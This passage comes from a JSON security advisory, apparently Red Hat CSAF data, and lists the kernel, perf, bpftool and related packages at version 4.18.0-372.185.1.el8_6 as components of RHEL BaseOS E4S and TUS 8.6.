        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch"
        },
        "product_reference": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "perf-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "perf-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "perf-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "perf-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64"
        },
        "product_reference": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le"
        },
        "product_reference": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x"
        },
        "product_reference": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS E4S (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.E4S"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.src as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.src",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch"
        },
        "product_reference": "kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64 as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64"
        },
        "product_reference": "kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch as a component of Red Hat Enterprise Linux BaseOS TUS (v.8.6)",
          "product_id": "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch"
        },
        "product_reference": "kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
        "relates_to_product_reference": "BaseOS-8.6.0.Z.TUS"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
